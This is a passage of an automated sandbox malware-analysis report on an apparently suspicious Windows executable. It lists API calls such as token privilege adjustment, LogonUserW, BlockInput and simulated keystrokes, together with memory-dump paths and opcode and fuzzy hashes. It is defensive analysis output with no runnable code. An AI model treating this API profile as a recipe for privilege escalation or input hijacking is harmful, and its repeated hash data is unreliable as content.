                                              • Part of subcall function 0081F4EA: std::exception::exception.LIBCMT ref: 0081F51E
                                              • Part of subcall function 0081F4EA: __CxxThrowException@8.LIBCMT ref: 0081F533
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0083B180
                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0083B1AD
                                            • GetLastError.KERNEL32 ref: 0083B1BA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                            • String ID:
                                            • API String ID: 1922334811-0
                                            • Opcode ID: 181d28f94fb97af7af17d7ee30ee22fa140eebe535462d6eb7bb1ee4ca72a2c6
                                            • Instruction ID: 326a47f6fc76a2462aadac8f2a7be0e0e709d320102d85856ca0e3f5cfb79f49
                                            • Opcode Fuzzy Hash: 181d28f94fb97af7af17d7ee30ee22fa140eebe535462d6eb7bb1ee4ca72a2c6
                                            • Instruction Fuzzy Hash: 1611BFB2400305AFE718AF58DC85D6BB7ADFF44310B20852EE15697241DB70FC418B60
                                            APIs
                                            • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 008466AF
                                            • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 008466EC
                                            • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 008466F5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CloseControlCreateDeviceFileHandle
                                            • String ID:
                                            • API String ID: 33631002-0
                                            • Opcode ID: 0513f0bd6bf453f06a76f92403867b12b9edde97119deb45879049a6dbb74906
                                            • Instruction ID: b19f4e9eef5dfbb7b5bbefc024af222f2aad90fdfa72b1c517b3f399c2f941ec
                                            • Opcode Fuzzy Hash: 0513f0bd6bf453f06a76f92403867b12b9edde97119deb45879049a6dbb74906
                                            • Instruction Fuzzy Hash: 5D11A5B1900228BEE7109BACDC45FAFB7BCFB05718F004656F901E71D0E274AE0487A5
                                            APIs
                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00847223
                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0084723A
                                            • FreeSid.ADVAPI32(?), ref: 0084724A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                            • String ID:
                                            • API String ID: 3429775523-0
                                            • Opcode ID: 8f23b2efbae1f3a2de360b23c2bd1864c145ec547b2ba8f1ff0a38a8e30f56c3
                                            • Instruction ID: 4851ef3f9e09600181fdc2330c18cd8e506365bfc02ecad32f414594d1640385
                                            • Opcode Fuzzy Hash: 8f23b2efbae1f3a2de360b23c2bd1864c145ec547b2ba8f1ff0a38a8e30f56c3
                                            • Instruction Fuzzy Hash: B9F01275904309BFDF04DFE8DD89AEEBBB8FF08201F504469A502E21D1E37066449B10
                                            APIs
                                            • FindFirstFileW.KERNEL32(?,?), ref: 0084F599
                                            • FindClose.KERNEL32(00000000), ref: 0084F5C9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Find$CloseFileFirst
                                            • String ID:
                                            • API String ID: 2295610775-0
                                            • Opcode ID: d017bbb33915628788d93ae437b0063781057b9d3eb028ac3a5322ec51b2353b
                                            • Instruction ID: 14d5b88b8ef533eda2c61a19056a6b9a06d64be0bb1b69c0281aa388f109f3c8
                                            • Opcode Fuzzy Hash: d017bbb33915628788d93ae437b0063781057b9d3eb028ac3a5322ec51b2353b
                                            • Instruction Fuzzy Hash: 7911AD326002049FD700EF28D849A2EF3E9FF84324F01891EF9A9D7291DB34A9008B82
                                            APIs
                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0085BE6A,?,?,00000000,?), ref: 0084CEA7
                                            • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0085BE6A,?,?,00000000,?), ref: 0084CEB9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ErrorFormatLastMessage
                                            • String ID:
                                            • API String ID: 3479602957-0
                                            • Opcode ID: 4e4725cef8a6acaca83502e84546981830a13618400d98613b54d55e21f6c44d
                                            • Instruction ID: a462fd2a61d40f345d896632cfa3e123d84def9bba7f3d53f8556a0092abe006
                                            • Opcode Fuzzy Hash: 4e4725cef8a6acaca83502e84546981830a13618400d98613b54d55e21f6c44d
                                            • Instruction Fuzzy Hash: 55F08C3110032DABDB60EFA8DC49FEA776DFF083A1F008165F919D6181E730AA40CBA1
                                            APIs
                                            • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00844153
                                            • keybd_event.USER32(?,76C1C0D0,?,00000000), ref: 00844166
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: InputSendkeybd_event
                                            • String ID:
                                            • API String ID: 3536248340-0
                                            • Opcode ID: bb890eec60148ccab29a6a1c992e3eea7646c1fb4aceacdcead8c555365175b1
                                            • Instruction ID: f1f222ff00c04b7570b3a59ba70eddd6d462aa6e1c5502ac4d836fe61ba307d9
                                            • Opcode Fuzzy Hash: bb890eec60148ccab29a6a1c992e3eea7646c1fb4aceacdcead8c555365175b1
                                            • Instruction Fuzzy Hash: 58F01D7090434DAFDB059FA4C805BBE7BB4FF04305F04841AF965D6192D77986169FA4
                                            APIs
                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0083ACC0), ref: 0083AB99
                                            • CloseHandle.KERNEL32(?,?,0083ACC0), ref: 0083ABAB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: AdjustCloseHandlePrivilegesToken
                                            • String ID:
                                            • API String ID: 81990902-0
                                            • Opcode ID: ac4d5d6e41bce3dfc55405f881369def7b7bfef00f4f91033b3462cd32f3ddb4
                                            • Instruction ID: 6ba3a559b60f3e2b9f29268ebbdab7d2a8effc89ad8e547590714c9c78b2432b
                                            • Opcode Fuzzy Hash: ac4d5d6e41bce3dfc55405f881369def7b7bfef00f4f91033b3462cd32f3ddb4
                                            • Instruction Fuzzy Hash: C8E0BF72000A11AFE7252F59EC05DB6B7AEFF04320B108429B59AC1471D7625C90AB51
                                            APIs
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00826DB3,-0000031A,?,?,00000001), ref: 008281B1
                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 008281BA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: 0fba20823a2c47d85284659cc5c9418ad0704ff4cb06512f5faa19b930b9620f
                                            • Instruction ID: 36ae787b8ab63cb0877230461db31342365a9d090141586f74f0506e3fed8d66
                                            • Opcode Fuzzy Hash: 0fba20823a2c47d85284659cc5c9418ad0704ff4cb06512f5faa19b930b9620f
                                            • Instruction Fuzzy Hash: D8B09231044708ABDB002BA9EC09B587F68FB08656F008020F60D482A1AB7254108B92
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: _memmove
                                            • String ID:
                                            • API String ID: 4104443479-0
                                            • Opcode ID: 28a16c38f402d428f3c0895828ca441b8da9b99d473f05e24eb54c8c643f6a3c
                                            • Instruction ID: 89c797a5b224ddac21cf3092e1aa0aec5f02b5286d20d311c814c7ae5c678965
                                            • Opcode Fuzzy Hash: 28a16c38f402d428f3c0895828ca441b8da9b99d473f05e24eb54c8c643f6a3c
                                            • Instruction Fuzzy Hash: 58A23675E04219CFDB64CF58C8806ADBBB1FF48314F2581A9E859EB391D734AE81DB90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Exception@8Throwstd::exception::exception
                                            • String ID: @
                                            • API String ID: 3728558374-2766056989
                                            • Opcode ID: da975ade62b7cbc441ba0f40b55f807f6407c7bc9b345121a504358b83d48a68
                                            • Instruction ID: e840cc4ece910dd092124f3b00f260228796485a0e2da31b5e08e35ddf4dcc64
                                            • Opcode Fuzzy Hash: da975ade62b7cbc441ba0f40b55f807f6407c7bc9b345121a504358b83d48a68
                                            • Instruction Fuzzy Hash: A3728E709042099FCF14DF98C881AEEB7B9FF48304F148059E91AEB295DB75EE85CB91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a91712fb8be5465cce554a4bb9223ca6a678659adef43c2e6c7e4af76017f36f
                                            • Instruction ID: 3982bdd861970a4e38fe8f0f066a76363be839226e38829f1e0518c4bbb872fe
                                            • Opcode Fuzzy Hash: a91712fb8be5465cce554a4bb9223ca6a678659adef43c2e6c7e4af76017f36f
                                            • Instruction Fuzzy Hash: 6E32F222D29F115DD723A634D822325AA88FFB73D4F15D737E819B5AAAEB29C4C34100
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: __itow__swprintf
                                            • String ID:
                                            • API String ID: 674341424-0
                                            • Opcode ID: 609df9b4c4cf496caa6177e598ae48f6a0ff081ef84be91a53783d306e8274fc
                                            • Instruction ID: 973cd4b1e8ac106d54c165694ea05e822cd6bed457373080716d3eb3ac7e2549
                                            • Opcode Fuzzy Hash: 609df9b4c4cf496caa6177e598ae48f6a0ff081ef84be91a53783d306e8274fc
                                            • Instruction Fuzzy Hash: 752255716083119FD764DF18C891BAAB7E8FF84314F10892DF99AD7292DB71E944CB82
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d468a3a7d15e06ff08c06b9501767968f65d27370c57d61b7f37212b943d8784
                                            • Instruction ID: 99e62555684ad99726526602e2f5d8ee98b318c3f64e463447c0ebdd33ab4794
                                            • Opcode Fuzzy Hash: d468a3a7d15e06ff08c06b9501767968f65d27370c57d61b7f37212b943d8784
                                            • Instruction Fuzzy Hash: 1EB1E220D2AF414DD723A6398831336B65CBFBB2D5F95D71BFC1A74D62EB2185934280
                                            APIs
                                            • __time64.LIBCMT ref: 0084B6DF
                                              • Part of subcall function 0082344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0084BDC3,00000000,?,?,?,?,0084BF70,00000000,?), ref: 00823453
                                              • Part of subcall function 0082344A: __aulldiv.LIBCMT ref: 00823473
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Time$FileSystem__aulldiv__time64
                                            • String ID:
                                            • API String ID: 2893107130-0
                                            • Opcode ID: 04ccfade1dcfbe4bb11c704f487ac51917337132d63b4ce7217de10a8cfc458a
                                            • Instruction ID: e3805792c1da161c3c8534e5538642913fd4dec2940722729cc5f116fea9b0d8
                                            • Opcode Fuzzy Hash: 04ccfade1dcfbe4bb11c704f487ac51917337132d63b4ce7217de10a8cfc458a
                                            • Instruction Fuzzy Hash: 7B217F726345108BC72ACF38D891A92B7E5FB95310B248E6DE4E5CB2C0CB78BA05DB54
                                            APIs
                                            • BlockInput.USER32(00000001), ref: 00856ACA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: BlockInput
                                            • String ID:
                                            • API String ID: 3456056419-0
                                            • Opcode ID: 39802fd8e04ad34e072d13c10fa193929a3907e95bfe587966bc1d1ee841c8b9
                                            • Instruction ID: 89cd955ca5abf6944563328fce3d38edc1162f4e0fe4ba01832e723efde4e2a2
                                            • Opcode Fuzzy Hash: 39802fd8e04ad34e072d13c10fa193929a3907e95bfe587966bc1d1ee841c8b9
                                            • Instruction Fuzzy Hash: 65E012352102146FD740EB9DD804996BBEDFF74751B04C416F945D7291DAB0F8548B91
                                            APIs
                                            • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 008474DE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: mouse_event
                                            • String ID:
                                            • API String ID: 2434400541-0
                                            • Opcode ID: a8d5c95f7b09c13307370f35174391e59012ecd50451454363915ee43ef18a82
                                            • Instruction ID: dcee6e3c2acd13af68f9313027a2b4948908e52eeccd5815ca07ff67a4cb8d71
                                            • Opcode Fuzzy Hash: a8d5c95f7b09c13307370f35174391e59012ecd50451454363915ee43ef18a82
                                            • Instruction Fuzzy Hash: 93D09EA556C70D79ED6907289C1FF761A08F3007C5F9495D9B582CA4C1BA905845913A
                                            APIs
                                            • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0083AD3E), ref: 0083B124
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: LogonUser
                                            • String ID:
                                            • API String ID: 1244722697-0
                                            • Opcode ID: a75ccdcaf035c60d28d495b87b8c79eca7f7e8ef366b4d17b86bfbdfc0a6a405
                                            • Instruction ID: 5cf8d8a95fc11c4f692bc00ce9eaced4f5ee66d61a15531c55490810a1c24298
                                            • Opcode Fuzzy Hash: a75ccdcaf035c60d28d495b87b8c79eca7f7e8ef366b4d17b86bfbdfc0a6a405
                                            • Instruction Fuzzy Hash: 17D09E321A4A4EAEDF029FA4EC06EAE3F6AEB04701F548511FA15D50A1C675D531AB50
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: NameUser
                                            • String ID:
                                            • API String ID: 2645101109-0
                                            • Opcode ID: 5cfb80401bf13c1d73a1164009541bc660f7c4cbe16a03e2568f8849c847db81
                                            • Instruction ID: 61526b0ad6074570db2cb71ee6877e4a8b3140fbf0cf19609d3fb0d45caa8bfd
                                            • Opcode Fuzzy Hash: 5cfb80401bf13c1d73a1164009541bc660f7c4cbe16a03e2568f8849c847db81
                                            • Instruction Fuzzy Hash: 0BC04CB140050DDFCB55DBC4C9449EEB7BCBB44305F1050919105F1150D7709B459B77
                                            APIs
                                            • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0082818F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: f39ab6630c8744d0eac5d88b890be2ebcb45c0305cc5c80ea53b9fe7babbb576
                                            • Instruction ID: 969c9ad57e12d60403dec3ceef5c2e0eaeb6b6abbd23a3e5663499513320bf94
                                            • Opcode Fuzzy Hash: f39ab6630c8744d0eac5d88b890be2ebcb45c0305cc5c80ea53b9fe7babbb576
                                            • Instruction Fuzzy Hash: 84A0113000020CAB8F002B8AEC088883F2CFA002A0B008020F80C00220AB22A8208B82
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c3967a89bd71fd1ee3e819edb83c4a9cde052adc4e2d049ea24b76a7a1f21e8b
                                            • Instruction ID: dc9559eb309fa82419eb8c4819e6eb8312256492edb447356516428d3d68bc0a
                                            • Opcode Fuzzy Hash: c3967a89bd71fd1ee3e819edb83c4a9cde052adc4e2d049ea24b76a7a1f21e8b
